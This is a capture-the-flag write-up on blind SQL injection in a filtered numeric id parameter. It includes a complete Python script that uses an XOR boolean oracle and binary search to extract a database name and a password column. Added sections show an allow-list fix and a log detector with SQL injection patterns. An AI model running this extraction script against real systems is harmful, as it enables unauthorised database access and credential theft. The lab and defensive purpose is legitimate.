I had already clicked through ids 1 to 5; visiting id=6 gives the hint: Clever! But not this table.
My guess is that the SQL injection lives in this id parameter rather than in the login box used earlier. A first look says it is a numeric injection with some characters filtered, so it needs a bit of fuzzing: spaces are filtered out, so use () instead, and union and most of the other usual injection keywords are filtered too. From the name FinalSQL you can already guess this will be a blind-injection challenge, hehe. ^ is not filtered, so that is where we can make something happen. The challenge itself hints that it is blind injection, so, as with these challenges, just run a script.
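The filter described above strips spaces and union but lets the ^ operator through, and in MySQL 1^1^(cond) evaluates to cond, so id=1^1^(cond) returns the id=1 row only when cond is true; that is the yes/no oracle a blind-injection script keys on. As an added example (not part of the original writeup, and not the challenge's real code) the block below puts a reconstructed blacklist of that shape next to the fix: an integer allow-list plus a bound parameter. The table, rows and filter are constructed assumptions, and SQLite is used only on the hardened side.

```python
import re
import sqlite3

# Constructed sample table; not the challenge's schema.
SCHEMA = "CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT)"
ROWS = [(1, "first"), (2, "second"), (6, "sixth")]

# Payload shape from the writeup: an XOR chain with no spaces and no UNION.
PAYLOAD = "1^1^(length(database())=5)#"


def blacklist_filter(value):
    """Hypothetical reconstruction of the filter the writeup describes:
    drop spaces and the UNION keyword, and nothing else."""
    value = value.replace(" ", "")
    return re.sub(r"union", "", value, flags=re.IGNORECASE)


def build_query_blacklist(id_param):
    """Vulnerable pattern: filter the value, then paste it into the statement.
    The returned SQL is only inspected here, never executed."""
    return "SELECT title FROM items WHERE id=" + blacklist_filter(id_param)


def build_query_allowlist(id_param):
    """Hardened pattern: a numeric id must be a short decimal integer, and it
    travels to the database as a bound parameter rather than as SQL text."""
    if not re.fullmatch(r"[0-9]{1,10}", id_param):
        raise ValueError("id must be a decimal integer")
    return "SELECT title FROM items WHERE id=?", (int(id_param),)


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO items VALUES (?, ?)", ROWS)
    return conn


def lookup_safe(conn, id_param):
    sql, params = build_query_allowlist(id_param)
    row = conn.execute(sql, params).fetchone()
    return row[0] if row else None


def rejects(id_param):
    """True when the allow-list refuses the value before any SQL is built."""
    try:
        build_query_allowlist(id_param)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(build_query_blacklist(PAYLOAD))   # the condition survives the filter intact
    print(rejects(PAYLOAD), rejects("6"))   # True False
    print(lookup_safe(make_db(), "6"))      # sixth
```

The blacklist catches the inputs its author thought of (a spaced union select collapses to select) and nothing else, while the allow-list never has to know which operators exist: anything that is not a plain integer is refused, and the integer that passes is bound, not concatenated.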
```python
import requests
import time


def get_DBlen(url):
    # Probe the database-name length. The XOR chain 1^1^(cond) reduces to cond,
    # so the page shows the id=1 result ("Click" in the body) only when cond is true.
    for i in range(1, 10):
        db_url = url + "1^1^(length(database())=%d)#" % i
        r = requests.get(db_url)
        if "Click" in r.text:
            print("数据库名称的长度为:%d" % i)
            return i


def get_DBname(url, length):
    # Binary-search the ASCII value of each character of the database name.
    DBname = ""
    for i in range(1, length + 1):
        Max = 122
        Min = 41
        Mid = (Max + Min) // 2
        while Min <= Max:
            db_url = url + "1^1^(ascii(substr(database(),%d,1))>=%d)#" % (i, Mid)
            r = requests.get(db_url)
            if "Click" in r.text:
                Min = Mid + 1
            else:
                Max = Mid - 1
            Mid = (Min + Max) // 2
        # When the loop ends, Mid equals the character's ASCII value.
        DBname = DBname + chr(Mid)
        print(DBname)
    return DBname


def get_TBname(url):
    # Same binary search, reading group_concat(password) from the F1naI1y table
    # one character at a time. Once substr() runs past the end of the string the
    # search bottoms out below printable ASCII (Mid == 31), which ends the loop.
    name = ""
    i = 0
    while True:
        i = i + 1
        Max = 128
        Min = 32
        Mid = (Max + Min) // 2
        while Min <= Max:
            db_url = url + "1^1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>=%d)" % (i, Mid)
            r = requests.get(db_url)
            if "Click" in r.text:
                Min = Mid + 1
            else:
                Max = Mid - 1
            Mid = (Min + Max) // 2
        name = name + chr(Mid)
        print(name)
        if Mid == 31:
            break
        time.sleep(0.5)
    return name


if __name__ == "__main__":
    url = "http://ff1a7c21-003a-43f1-85ec-8bbd9c55b53a.node3.buuoj.cn/search.php?id="
    db_Len = get_DBlen(url)
    db_Name = get_DBname(url, db_Len)
    tb_name = get_TBname(url)
```
Let me gripe for a moment: when I ran this script for the flag it went wrong two or three times, and in the end I fixed it by hand… and then fixed the script.
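From the defender's side, a script like the one above is loud: one request per binary-search step, every one of them carrying a non-numeric id full of SQL functions and the ^ operator, all from one client within seconds. As an added example (not from the writeup) the block below runs a small detector over constructed access-log lines in combined format: it flags every request whose id is not a plain integer, records why, and counts hits per client. The log lines, addresses and indicator lists are constructed assumptions a practitioner would tune for their own application.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined-format shape); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search.php?id=1 HTTP/1.1" 200 512
203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /search.php?id=6 HTTP/1.1" 200 498
198.51.100.9 - - [01/Jan/2024:10:00:03 +0000] "GET /search.php?id=1%5E1%5E(length(database())%3D5)%23 HTTP/1.1" 200 512
198.51.100.9 - - [01/Jan/2024:10:00:03 +0000] "GET /search.php?id=1%5E1%5E(ascii(substr(database(),1,1))%3E%3D81)%23 HTTP/1.1" 200 512
198.51.100.9 - - [01/Jan/2024:10:00:04 +0000] "GET /search.php?id=1%5E1%5E(ascii(substr(database(),1,1))%3E%3D101)%23 HTTP/1.1" 200 470
203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?id=2 HTTP/1.1" 200 503
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

# Indicators typical of boolean blind probing inside a numeric parameter:
# string/character functions, bitwise or boolean operators, comment terminators.
SQL_FUNCTIONS = re.compile(
    r"\b(ascii|ord|substr|substring|mid|length|char_length|database|sleep|benchmark)\s*\(",
    re.IGNORECASE,
)
SQL_OPERATORS = re.compile(r"(\^|\|\||&&|\bor\b|\band\b|--|#|/\*)", re.IGNORECASE)


def parse_line(line):
    """Split one log line into fields and decode its query parameters."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    qs = urlsplit(rec["target"]).query
    # parse_qs percent-decodes, so %5E becomes ^ and %23 becomes # here.
    rec["params"] = {k: v[0] for k, v in parse_qs(qs, keep_blank_values=True).items()}
    return rec


def classify_id(value):
    """Reasons a value is suspicious for an integer id; an empty list means clean."""
    if re.fullmatch(r"[0-9]{1,10}", value):
        return []
    reasons = ["non-numeric id"]
    if SQL_FUNCTIONS.search(value):
        reasons.append("sql function call")
    if SQL_OPERATORS.search(value):
        reasons.append("sql operator/comment")
    return reasons


def analyse(log_text):
    """Return (suspicious events in log order, hit count per client address)."""
    events = []
    per_ip = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or "id" not in rec["params"]:
            continue
        reasons = classify_id(rec["params"]["id"])
        if reasons:
            events.append({"ip": rec["ip"], "ts": rec["ts"],
                           "id": rec["params"]["id"], "reasons": reasons})
            per_ip[rec["ip"]] += 1
    return events, dict(per_ip)


if __name__ == "__main__":
    found, counts = analyse(SAMPLE_LOG)
    for ev in found:
        print(ev["ts"], ev["ip"], ev["id"], ", ".join(ev["reasons"]))
    print(counts)
```

The first check (is the id a plain integer?) is the one that matters and needs no signature list at all; the function and operator matches only explain the hit. Per-client counts are what turn three odd requests into an alert: a binary search over one character costs six or seven requests, so extracting a string of any length stands out as a burst from one address.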